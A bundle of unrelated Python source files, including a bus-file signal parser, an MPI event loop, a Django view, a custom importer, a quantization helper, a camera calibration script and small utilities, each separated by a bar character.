i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
]
Monaco = Monaco()
|
from seahub.tags.models import FileUUIDMap
from seahub.test_utils import BaseTestCase
from seaserv import seafile_api
class FileUUIDMapManagerTest(BaseTestCase):
def setUp(self):
self.login_as(self.user)
self.repo = seafile_api.get_repo(self.create_repo(name='test-repo', desc='',
username=self.user.username,
passwd=None))
def test_get_fileuuid_by_uuid(self):
args = (self.repo.id, '/', 'dev', True)
uuid_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
uuidmap_obj = FileUUIDMap.objects.get_fileuuidmap_by_uuid(uuid_obj.uuid)
assert uuid_obj == uuidmap_obj
def test_create(self):
args = (self.repo.id, '/', 'dev_create', True)
uuidmap_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
data = (uuidmap_obj.repo_id, uuidmap_obj.parent_path, uuidmap_obj.filename, uuidmap_obj.is_dir)
assert args == data
def test_file_uuidmap_by_path(self):
args = (self.repo.id, '/', 'dev_by_path', True)
assert None == FileUUIDMap.objects.get_fileuuidmap_by_path(*args)
uuidmap_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
assert uuidmap_obj == FileUUIDMap.objects.get_fileuuidmap_by_path(*args)
|
"""Return a dict containing information specified in an input busfile
Given a valid path to a file with either the .bus or .txt extension, attempts
to load the information specified by the file into numpy arrays and return the
information contained in the file as a dict. This dict will have keys 'param',
'signal', and 'out'. Each entry in the dict is, itself, a dict containing
information read from the busfile.
Positional arguments:
path: String that gives a path from the module to the busfile.
"""
import argparse
import os
import logging
from unit import unit
class ParseError(Exception):
"""Base class for exceptions in this module"""
pass
class ParamMissingError(ParseError):
"""Exception raised if not all required parameters were in the bus file
Attributes:
message -- message indicating cause of failure
"""
def __init__(self, param):
self.message = "Required parameter '{}' was not found in bus file"\
.format(param)
class NameExpandError(ParseError):
"""Exception raised if a bus name was improperly specified
Attribute:
message -- message containing the signal that expand_signal failed to
expand
"""
def __init__(self, signal):
self.message = 'Improperly formatted bus signal: {}'.format(signal)
class VectorRangeError(ParseError):
"""Exception raised if an attempt to expand a vector range fails
Attributes:
message -- error message containing the string that expand_vector
failed to expand
"""
def __init__(self, vector):
self.message = 'Bad vector range: {}'.format(vector)
def bin_str(tok):
"""Returns a binary string equivalent to the input value.
Given a string that represents a binary number (with or without a '0b') or
a hex value with a '0x' in front, converts the value to a string of 1s and
0s. If a hex value is specified, each hex digit specifies four bits.
"""
if tok.startswith('0x'): # Specified as hex
# Calculate the length of the binary string if each hex digit
# specifies 4 binary digits
bin_strlen = 4 * (len(tok) - 2)
# Convert hex value to binary
intval = int(tok[2:], 16) # Convert hex value to integer
binstr = bin(intval) # Convert integer value to binary string with '0b'
bitstr = binstr[2:] # Get rid of the '0b'
bits = bitstr.zfill(bin_strlen) # Left-pad string with the zeros
elif tok.startswith('0b'): # Specified as binary
bits = tok[2:]
else: # Base not specified - assume binary literal
bits = tok
return bits
def expand_vector(range_token):
"""Expands busfile vector notation into a list of strings"""
range_parts = range_token.split(']')
# We now have a list of strings of the following format:
# ['[n_bits', '(lo_val, hi_val)']
try:
n_bits = int(range_parts[0][1:]) # Remove leading '[' from nbits
except IndexError:
logging.critical('Bad vector range: {}'.format(range_token))
raise
# Generate a list with two integer elements that will specify the numeric
# bounds to the values we will expand
try:
range_parts = range_parts[1].split(',') # Split high and low of range
assert len(range_parts) in (2,3)
# Account for difference in start/stop/step vs. start/stop syntax
if len(range_parts) == 2:
start = range_parts[0]
step = 1
stop = range_parts[1]
elif len(range_parts) == 3:
start = range_parts[0]
step = int(range_parts[1])
stop = range_parts[2]
# Handle different bases for start value
if start.lower().startswith('0x'):
# Convert to integer using base 16
start = int(start[3:], 16)
elif start.lower().startswith('0b'):
# Convert to integer using base 2
start = int(start[3:], 2)
else:
# Convert to integer using base 10
start = int(start[1:])
# Handle different bases for the end value
if stop.lower().startswith('0x'):
# Convert to integer using base 16
stop = int(stop[2:-1], 16)
elif stop.lower().startswith('0b'):
# Convert to integer using base 2
stop = int(stop[2:-1], 2)
else:
# Convert to integer using base 10
stop = int(stop[:-1])
except (IndexError, AssertionError):
logging.critical('Bad vector range: {}'.format(range_token))
raise
if stop > 2**n_bits: # Ensure the user left enough bits for range
logging.critical('Insufficient bits to express range for vector {}'\
.format(range_token))
raise VectorRangeError(range_token)
direction = 1 if range_parts[0] < range_parts[1] else -1
range_sorted = sorted((start, stop))
expanded_range = []
logging.debug('expanded range: {}'.format(list(range(range_sorted[0], (range_sorted[1] + 1), (step * direction)))))
for n in range(range_sorted[0], (range_sorted[1] + 1), (step * direction)):
bin_str = format(n, 'b').zfill(n_bits)
expanded_range.append(bin_str)
return expanded_range
def read_vectors(f_obj, signals):
"""Read bit vectors from the busfile into a list.
Reads bit vectors line-by-line. Expands any value ranges as it finds them.
Returns a list of binary numbers represented as strings of 1s and 0s.
Positional arguments:
f_obj -- file object for busfile. The position should be set to the
beginning of a line that starts with 'Vectors:'
signals -- Python list of signal names. These should be in the same
order that bits will be specified in these vectors.
"""
# Ensure that our position in f_obj is at the beginning of a 'Vectors:'
# section
line = f_obj.readline()
tokens = [tok.strip() for tok in line.strip().split()]
assert tokens[0] == 'Vectors:', "keyword 'Vectors:' expected, found {}"\
.format(tokens[0])
# Read in and tokenize another line
fposition = f_obj.tell()
line = f_obj.readline()
tokens = [tok.strip() for tok in line.strip().split()]
# Initialize a dictionary with signal names as keys and empty strings as
# entries. 1s and 0s will be appended to these empty strings as we read in
# bit vectors
signal_dict = dict([(sig, '') for sig in signals])
# Our vectors array is going to be an array of strings. Each of these
# strings must have a length equal to the number of signals we are
# specifying, but the number of strings could vary from 1 to however large
# a user-specified range is.
vectors = []
while line != '' and tokens[0].lower() != 'outputs:':
line_vectors = [''] # Temporary holding place for this line's vectors
# If we come across a line where 'Output:' is the first token on the
# line, we stop reading vectors and return our inputs
for tok in tokens:
if '[' not in tok and ']' not in tok:
# No range specified by token. Add the bits from this token to
# the end of each of each vector we've found on this line
line_vectors = [vect + bin_str(tok) for vect in line_vectors]
else:
# This token specifies a range of values we need to expand.
vector_range = expand_vector(tok)
# If we've previously expanded a range, line_vectors will have
# length > 1. If this is the case, the lenth of vector_range
# should be the same as that of line_vectors. We don't allow
# expanding two ranges of different sizes on the same line.
if len(line_vectors) > 1:
assert len(vector_range) == len(line_vectors), \
'ranges on same line must have same length'
# Create a new list of vectors where our new range is
# appended element-wise onto the old range
line_vectors = [old + new for (old, new) in \
zip(line_vectors, vector_range)]
else:
# If we've not previously encountered a range, our list
# size needs to be increased to that of the range we just
# read.
line_vectors = [line_vectors[0] + v for v in vector_range]
for vect in line_vectors:
assert len(vect) == len(signals),\
'Vector {} has length {} and should have length {}.'\
.format(vect, len(vect), len(signals))
vectors.extend(line_vectors)
# Read in and tokenize another line
fposition = f_obj.tell()
line = f_obj.readline()
# We want to eat blank lines, but also if we hit EOF we shouldn't try
# to keep reading lines. Also: eat comment lines
while not line.strip() or line[0] == '#':
# If line evaluates to true, it's a blank line, not EOF.
if line:
fposition = f_obj.tell()
line = f_obj.readline()
else:
# line == '', we've hit EOF. When the main while loop for this
# function sees that line == '', the loop will exit.
break # line == '', we've hit EOF.
tokens = [tok.strip() for tok in line.strip().split()]
f_obj.seek(fposition)
return vectors
def expand_signal(signal):
"""Returns a list of 1-wire signals from a signal specified as a bus
Given a string of the form: "name[left:right]suffix", expands into a series
of signals of the form: "name[#]". If the supplied string is not formatted
correctly, this function will raise exceptions.
"""
# Anatomy of a bus signal: name[left:right]suffix
name, lbrack, tail = signal.partition('[')
left, colon, end = tail.partition(':')
right, rbrack, suffix = end.partition(']')
if not name:
msg = 'No signal name found for signal {}'.format(signal)
logging.critical(msg)
raise NameExpandError(signal)
# Only expand a complete bus - force users to be specific instead of
# assuming what they wanted and giving them bogus results
nodes = []
if lbrack and colon and rbrack:
try:
start = int(left)
stop = int(right)
except ValueError:
msg = 'Bad bus range: Start: {} Stop: {}.'.format(left, right)
logging.critical(msg)
raise NameExpandError(signal)
inc = 1 if (stop > start) else -1 # [4:0] or [0:4]
signal_bus = range(start, (stop + inc), inc)
for wire in signal_bus:
single_signal = '%s[%i]%s' % (name, wire, suffix)
nodes.append(single_signal)
else:
# Partial bus notation - error
msg = 'Improperly specified bus signal: {}'.format(signal)
logging.critical('One of ([,:,]) is missing from bus signal {}'\
.format(signal))
raise NameExpandError(signal)
return nodes
def read_signals(f_obj):
"""Return a list of signals defined by the busfile
Reads a list of signal names from the bus file. Names may use square
brackets to describe a multi-wire bus. Buses will be expanded to
individual signals.
Positional argument:
f_obj -- File object for the bus file. Current position in the file
should be the beginning of the 'Signals:' section
"""
fposition = f_obj.tell()
line = f_obj.readline()
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Make sure that we are at the beginning of the signal declaration section.
# We know we're there if the first token on the first line we read in is
# 'Signals:'.
tokens = [tok.strip() for tok in line.strip().split()]
assert tokens[0].lower() == 'signals:' or tokens[0].lower() == 'outputs:',\
"keyword 'Signals:' or 'Outputs:' expected, found {}" \
.format(tokens[0])
# 'Signals:' should be alone on its line. Read in the next line.
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
sig_names = [tok.strip() for tok in line.strip().split()]
# Everything from this point in the file until we find a line that begins
# with the token 'Vectors:' will be taken to be a signal. Blank lines are
# ignored, as are comment lines.
signals = []
while sig_names[0].lower() != 'vectors:':
for sig in sig_names:
# Check whether the signal is a bus. If it is, expand the signal
# bus into individual wires. If the signal is already a single wire
# we add it to our list straight away. We go into our bus
# processing function if we find *either* a '[' or a ']' because
# expand_signal contains logic that informs the user if their
# bus signal declaration is incorrect.
if '[' in sig or ']' in sig:
individual_signals = expand_signal(sig)
signals.extend(individual_signals)
else:
signals.append(sig)
# Read and tokenize a new line
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
if line == '':
raise NameExpandError(\
"'Vectors:' keyword not reached before EOL")
sig_names = [tok.strip() for tok in line.strip().split()]
# We just found the 'Vectors:' line. Reset our position in f_obj to the
# beginning of that line so that the read_vectors function can verify that
# it's in the right place
f_obj.seek(fposition)
return signals
def read_params(f_obj):
"""Return a dict containing name, value pairs from the bus file
Starts looking at the beginning of the file for a line that isn't a comment
or whitespace. It tokenizes each line that it finds and attempts to match
the first token on the line with a valid parameter name. If there is a
match, the value of the parameter is shown. Otherwise, a warning is
displayed.
Positional argument:
f_obj: File object returned by open() for the bus file.
"""
params = {}
# Required parameters
logging.debug('Searching for input parameters')
required_params = ['risefall', 'bittime', 'bitlow', 'bithigh']
# Optional parameters
params['edge'] = 'rising'
params['clockdelay'] = None
params['clockrisefall'] = None
params['tsu'] = None
params['th'] = None
for p in required_params:
params[p] = None
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Read in parameters, ignoring blank lines
while line.split()[0].lower() != 'signals:':
assert '=' in line, 'improperly formatted param line: {}'.format(line)
name, value = line.split('=')
name = name.strip().lower()
# Add read-in param to our dict, if it is a valid param.
# If it is not a valid param, warn the user.
if name in params:
value = value.strip()
params[name] = value
logging.info('Parameter {} set to {}'.format(name, value))
else:
logging.error('Unkown parameter encountered: {}'.format(name))
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0][0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Put file position back to the beginning of the line that did not start
# with a parameter name.
f_obj.seek(fposition)
# Ensure that we have all of the required parameters. Raise an exception if
# a required param is missing. We put all of these parameters into our
# params dict with the value None. If any of our required params evaluate
# as false now, we know we didn't find it in our bus file.
for p in required_params:
if not params[p]:
raise ParamError(p)
valid_edge_settings = ('rising', 'falling')
assert params['edge'] in valid_edge_settings,\
'Invalid edge value: {}. Valid values are: {}'\
.format(params['edge'], valid_edge_settings)
return params
def parse_busfile(buspath):
"""Return a dict containing information from a busfile.
Positional argument:
path: String that gives a path from this module to the busfile
"""
file_contents = {'params': {}, 'signals': {}, 'outputs': {}}
try:
with open(buspath) as f:
file_contents['params'] = read_params(f)
# Read signal labels from the first line following parameters
signals = read_signals(f)
# Read signal vectors
vectors = read_vectors(f, signals)
# Prepare to load in vectors
for sig in signals:
file_contents['signals'][sig] = ''
# Create signal dict from vectors and signals
for vect in vectors:
for (sig, bit) in zip(signals, vect):
file_contents['signals'][sig] += bit
# Read in the next line from the file. There are only two things
# it can be if no exceptions were thrown by read_vectors: it can
# be EOF, or it can start with 'Outputs:'.
line = f.readline()
if line.lower().startswith('outputs:'):
assert 'th' in file_contents['params'].keys(), \
'Outputs were specified for verification but no hold \
time ("th") was specified to use for verification.'
assert 'tsu' in file_contents['params'].keys(), \
'Outputs were specified for verification but no setup \
time ("tsu") was specified to use for verification.'
output_signals = read_signals(f)
logging.info('Output signals: {}'.format(str(output_signals)))
output_vectors = read_vectors(f, output_signals)
for sig in output_signals:
file_contents['outputs'][sig] = ''
for vect in output_vectors:
for (sig, bit) in zip(output_signals, vect):
file_contents['outputs'][sig] += bit
# Check that an output was specified for all inputs
input_sig = list(file_contents['signals'].keys())[0]
output_sig = list(file_contents['outputs'].keys())[0]
n_input_vectors = len(file_contents['signals'][input_sig])
n_output_vectors = len(file_contents['outputs'][output_sig])
assert n_input_vectors == n_output_vectors, \
'Number of output vectors ({}) does not match number \
of input vectors ({})'.format(n_output_vectors, n_input_vectors)
elif line == '':
logging.info('No output signals detected')
else:
logging.error('Expected "outputs:" or EOF, got {}'\
.format(line))
except FileNotFoundError:
msg = 'No bus file exists at {}'.format(buspath)
logging.critical(msg)
raise
return file_contents
def write_busfile(file_contents):
"""Writes the contents of a busfile to a text file. Useful for debugging"""
with open('busout.txt', 'w') as f:
for key in file_contents['params']:
f.write('{}, {}\n'.format(key, file_contents['params'][key]))
f.write('\n')
f.write('\nSignals:\n')
for sig in file_contents['signals']:
f.write('{}, {}\n'.format(sig, file_contents['signals'][sig]))
f.write('\nOutputs:\n')
for sig in file_contents['outputs']:
f.write('{}, {}\n'.format(sig, file_contents['outputs'][sig]))
if __name__ == '__main__':
"""Barebones interface for calling this module standalone
This is useful for debugging.
"""
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
path = os.path.abspath(args.file)
write_busfile(parse_busfile(path))
|
import asyncio
from oremda.typing import MPINodeReadyMessage, OperateTaskMessage, Message, MessageType
from oremda.utils.concurrency import ThreadPoolSingleton
from oremda.utils.mpi import mpi_world_size
from .event_loop import MPIEventLoop
class MPIRootEventLoop(MPIEventLoop):
"""Forward messages between the messages queue and MPI nodes"""
async def loop(self, rank):
while True:
# Wait until the node indicates it is ready
msg = await self.mpi_recv(rank)
ready_msg = MPINodeReadyMessage(**msg.dict())
queue = ready_msg.queue
# Wait until a task becomes available for the node
msg = await self.mqp_recv(queue)
# Forward the input to the node
await self.mpi_send(msg, rank)
# Check if it was a terminate message. If so, we can end our loop.
task_message = Message(**msg.dict())
if task_message.type == MessageType.Terminate:
break
# It must have been an OperateTaskMessage. Read the output queue.
operate_message = OperateTaskMessage(**msg.dict())
output_queue = operate_message.output_queue
# Get the output from the node
output = await self.mpi_recv(rank)
# Put the output on the message queue
await self.mqp_send(output, output_queue)
def start_event_loop(self):
if self.started:
# Already started...
return
def run_loop():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# Use our ThreadPoolExecutor singleton for the asyncio executor
loop.set_default_executor(ThreadPoolSingleton().executor)
for i in range(1, mpi_world_size):
task = loop.create_task(self.loop(i))
self.tasks.append(task)
# Run until all tasks complete
loop.run_until_complete(asyncio.gather(*self.tasks))
future = ThreadPoolSingleton().submit(run_loop)
self.started = True
return future
|
"""Mix-in classes for easy attribute setting and pretty representation
>>> class T(HasInitableAttributes, HasTypedAttributes, IsCallable):
... spam = str
... def __init__(self, eggs, ham = 'ham'): pass
...
>>> t = T('bacon'); t(ham = 'eggs'); t.spam += 'sausage'; t
__main__.T('bacon', ham = 'eggs', spam = 'sausage')
>>>
"""
from inspect import getargspec
from itertools import chain
class HasInitableAttributes(object):
"""Initializes attributes automatically
>>> class T(HasInitableAttributes):
... z = 0
... def __init__(self, x, y=0, **opts): pass
...
>>> t = T(0, a = 1); t
__main__.T(0, a = 1)
>>> t.x, t.y, t.z = 1, 2, 3; t
__main__.T(1, y = 2, a = 1, z = 3)
>>>
"""
def __new__(cls, *pars, **opts):
"Initialize all attributes in the signature and any other options supplied"
try:
self = super().__new__(cls, *pars, **opts)
except:
self = super().__new__(cls)
self._argspec = names, parsname, optsname, defaults = getargspec(self.__init__)
if not defaults: defaults = []
n = len(names) - len(defaults) - 1
if n - len(pars) > 0:
_s, _to = ('s', '-%d' % (n-1)) if n - len(pars) > 1 else ('', '')
missing = "%s %s (pos %d%s)" % (_s, ", ".join(names[1:n+1]), len(pars), _to)
raise TypeError("Required argument%s not found." % missing)
for n, v in chain(zip(names[-len(defaults):], defaults), zip(names[1:], pars), opts.items()):
setattr(self, n, v)
return self
def __repr__(self):
"Show all attributes in the signature and any other public attributes that are changed"
names, parsname, optsname, defaults = self._argspec
if not defaults: defaults = []
optnames = names[-len(defaults):] if defaults else []
optvalues = (getattr(self, name) for name in optnames)
othernames = sorted(set((n for n in self.__dict__ if n[0] != '_')) - set(names))
othervalues = list((getattr(self, name, None) for name in othernames))
otherdefaults = list((getattr(self.__class__, name, None) for name in othernames))
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__, ", ".join(chain(
(repr(getattr(self, name)) for name in names[1:len(names)-len(defaults)]),
("%s = %r" % (name, value) for name, value, default in zip(optnames, optvalues, defaults) if value != default),
("%s = %r" % (name, value) for name, value, default in zip(othernames, othervalues, otherdefaults) if value != default))))
class HasTypedAttributes(object):
"""Objectifies class attributes automatically
>>> class T(HasTypedAttributes):
... spam = str
... class C(HasTypedAttributes):
... eggs = list
...
>>> a, b = T(), T(); a.spam += 'ham'; a.C.eggs.append('bacon'); a.spam, b.spam, a.C.eggs, b.C.eggs
('ham', '', ['bacon'], [])
>>>
"""
def __new__(cls, *pars, **opts):
try:
self = super().__new__(cls, *pars, **opts)
except:
self = super().__new__(cls)
for name in dir(self):
if name[0] != '_':
value = getattr(self, name)
if isinstance(value, type):
setattr(self, name, value(opts.pop(name)) if name in opts else value())
if opts:
raise TypeError("__init__() got%s unexpected keyword argument%s %r" %
(" an", "", opts.keys()[0]) if len(opts) == 1 else ("", "s", opts.keys()))
return self
class IsCallable(object):
"""Update attributes by calling
>>> class T(IsCallable):
... x = 0
...
>>> t = T(); t(x=1, y=2); t.x, t.y
(1, 2)
"""
def __call__(self, *pars, **opts):
self.__dict__.update(*pars, **opts)
if __name__ == '__main__':
from doctest import testmod
testmod()
class T(HasInitableAttributes, HasTypedAttributes, IsCallable):
spam = str
t = T()
assert t.spam != str
|
from time import sleep
from rest_framework import status
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from app.core.draw_flag_scripts.flag import Flag3
from app.core.serializers import DrawFlagSerializer
from app.core.tasks import shared_task_draw_flag
from app.core.web_sockets.send_massage import SendMassageWS
class DrawFlagAPIView(APIView):
renderer_classes = [TemplateHTMLRenderer]
template_name = 'flag.html'
@classmethod
def get(cls, request, *args, **kwargs):
return Response(data={'serializer': DrawFlagSerializer()}, status=status.HTTP_200_OK)
@classmethod
def post(cls, request, *args, **kwargs):
SendMassageWS.send_ws_msg(
chat_name='lobby',
title='hello',
msg='world'
)
sleep(.5)
serializer = DrawFlagSerializer(data=request.data)
if not serializer.is_valid():
out_data = {
'serializer': DrawFlagSerializer(),
'errors': [
*serializer.errors.get('non_field_errors', []),
*serializer.errors.get('even_number', [])
]
}
return Response(data=out_data, status=status.HTTP_400_BAD_REQUEST)
if not (flag_obj := Flag3.get_flag_object()):
out_data = {
'serializer': DrawFlagSerializer(),
'errors': ["Check your data base - you do not have flag object!"]
}
return Response(data=out_data, status=status.HTTP_400_BAD_REQUEST)
""" normal way """
# out_data = {
# 'serializer': DrawFlagSerializer(),
# 'flag': Flag3(
# number=serializer.validated_data.get('even_number'),
# flag_obj_id=flag_obj.id
# ).print_flag()
# }
""" celery """
celery_result = shared_task_draw_flag.delay(
even_number=serializer.validated_data.get('even_number'),
flag_obj_id=flag_obj.id
)
out_data = {
'serializer': DrawFlagSerializer(),
'flag': celery_result.get()
}
return Response(data=out_data, status=status.HTTP_200_OK)
|
"""
Custom importer that additionally rewrites code of all imported modules.
Based on Demo/imputil/importers.py file distributed with Python 2.x.
"""
import imp
from . import imputil
import marshal
import os
import struct
import sys
from types import CodeType
# byte-compiled file suffic character
_suffix_char = __debug__ and 'c' or 'o'
# byte-compiled file suffix
_suffix = '.py' + _suffix_char
# the C_EXTENSION suffixes
_c_suffixes = filter(lambda x: x[2] == imp.C_EXTENSION, imp.get_suffixes())
def _timestamp(pathname):
"Return the file modification time as a Long."
try:
s = os.stat(pathname)
except OSError:
return None
return long(s[8])
def _compile(path):
"Read and compile Python source code from file."
f = open(path)
c = f.read()
f.close()
return compile(c, path, 'exec')
def _fs_import(dir, modname, fqname):
"Fetch a module from the filesystem."
pathname = os.path.join(dir, modname)
if os.path.isdir(pathname):
values = { '__pkgdir__' : pathname, '__path__' : [ pathname ] }
ispkg = 1
pathname = os.path.join(pathname, '__init__')
else:
values = { }
ispkg = 0
# look for dynload modules
for desc in _c_suffixes:
file = pathname + desc[0]
try:
fp = open(file, desc[1])
except IOError:
pass
else:
module = imp.load_module(fqname, fp, file, desc)
values['__file__'] = file
return 0, module, values
t_py = _timestamp(pathname + '.py')
t_pyc = _timestamp(pathname + _suffix)
if t_py is None and t_pyc is None:
return None
code = None
if t_py is None or (t_pyc is not None and t_pyc >= t_py):
file = pathname + _suffix
f = open(file, 'rb')
if f.read(4) == imp.get_magic():
t = struct.unpack('<I', f.read(4))[0]
if t == t_py:
code = marshal.load(f)
f.close()
if code is None:
file = pathname + '.py'
code = _compile(file)
values['__file__'] = file
return ispkg, code, values
class PathImporter(imputil.Importer):
def __init__(self, path, callback):
self.path = path
self.callback = callback
def rewrite(self, retvals):
if isinstance(retvals, tuple) and type(retvals[1]) == CodeType:
return (retvals[0], self.callback(retvals[1]), retvals[2])
return retvals
def get_code(self, parent, modname, fqname):
if parent:
# we are looking for a module inside of a specific package
return self.rewrite(_fs_import(parent.__pkgdir__, modname, fqname))
# scan sys.path, looking for the requested module
for dir in self.path:
if isinstance(dir, str):
result = _fs_import(dir, modname, fqname)
if result:
return self.rewrite(result)
# not found
return None
class ImportManager(imputil.ImportManager):
def _import_hook(self, fqname, globals=None, locals=None, fromlist=None, level=-1):
# TODO: support level argument added in Python 2.5
return imputil.ImportManager._import_hook(self, fqname, globals, locals, fromlist)
import_manager = ImportManager()
def install(callback):
"Install callback as a code-rewriting function for each imported module."
import_manager.install()
sys.path.insert(0, PathImporter(sys.path, callback))
sys.path.insert(0, imputil.BuiltinImporter())
def uninstall():
import_manager.uninstall()
|
# Copyright 2021 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
from model_compression_toolkit import common
from model_compression_toolkit.common import Logger
from model_compression_toolkit.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.common.graph.base_node import BaseNode
from model_compression_toolkit.common.framework_info import FrameworkInfo
from model_compression_toolkit.common.quantization.node_quantization_config import NodeWeightsQuantizationConfig
from model_compression_toolkit.common.quantization.quantization_params_generation.qparams_weights_computation import \
get_channels_axis
def get_quantized_kernel_by_weights_qc(fw_info:FrameworkInfo,
n:BaseNode,
weights_qc: NodeWeightsQuantizationConfig,
fw_impl: FrameworkImplementation):
"""
For a node and a weights quantization configuration, compute
the quantized kernel of the node and return it and the input/output channels indices.
Args:
fw_info: A FrameworkInfo object Information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.).
n: Node to quantize its kernel.
weights_qc: Weight quantization configuration to use for the quantization.
fw_impl: FrameworkImplementation with specific framework implementations.
Returns:
A quantized kernel of the node using a weights quantization configuration.
"""
# If weights should be quantized per-channel but a kernel channels mapping is missing.
if weights_qc.weights_per_channel_threshold and fw_info.kernel_channels_mapping is \
None:
common.Logger.warning(
'Weights Per Channel Quantization requires channel mapping function but framework info '
'does not contain one')
output_channels_axis, input_channels_axis = get_channels_axis(weights_qc,
fw_info,
n.type)
Logger.debug(f'quantizing {n.name} with {weights_qc.weights_n_bits} bits')
quantized_kernel = weights_qc.weights_quantization_fn(n.get_weights_by_keys(fw_impl.constants.KERNEL),
n_bits=weights_qc.weights_n_bits,
signed=True,
quantization_params=weights_qc.weights_quantization_params,
per_channel=weights_qc.weights_per_channel_threshold,
output_channels_axis=output_channels_axis)
return quantized_kernel, (input_channels_axis, output_channels_axis)
|
#!/usr/bin/env python3
# encoding:utf-8
import os
import cv2
from CalibrationConfig import *
# Collect calibration images and save them in calib folder
# Press the Space key on the keyboard to store the image, and press ESC to exit
cap = cv2.VideoCapture(-1)
# If the calib folder does not exist, create a new one
if not os.path.exists(save_path):
os.mkdir(save_path)
# Count the number of images stored
num = 0
while True:
ret, frame = cap.read()
if ret:
Frame = frame.copy()
cv2.putText(Frame, str(num), (10, 50), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 5)
cv2.imshow("Frame", Frame)
key = cv2.waitKey(1)
if key == 27:
break
if key == 32:
num += 1
# Image name format:current number of images.jpg
cv2.imwrite(save_path + str(num) + ".jpg", frame)
cap.release()
cv2.destroyAllWindows()
|
"""
TAC Conformance Server
DASH-IF Implementation Guidelines: Token-based
Access Control for DASH (TAC)
"""
import requests
class Proxy(object):
"""
Handles /proxy/{url}.
"""
def on_get(self, req, resp):
"""
GET /proxy/{url}
"""
response = requests.get('https://{}'.format(
req.path.replace('/proxy/', '')))
resp.content_type = response.headers['Content-Type']
resp.body = response.content
|
'''
Ряд - 3
'''
def printRangeOdd(n):
start = int('1' + '0' * n) - 1
if (n == 1):
end = 0
else:
end = int('9' + '9' * (n - 2))
for i in range(start, end, -2):
print(i, end=' ')
print('')
n = int(input())
printRangeOdd(n)
|
from flask import Flask, request, session, g, url_for, redirect, abort
import database
import bot
import _thread as thread
app = Flask(__name__)
with open('src/secrets/flask_key.txt') as flask_key_file:
app.secret_key = bytes(flask_key_file.readline(), "utf-8").decode("unicode_escape")
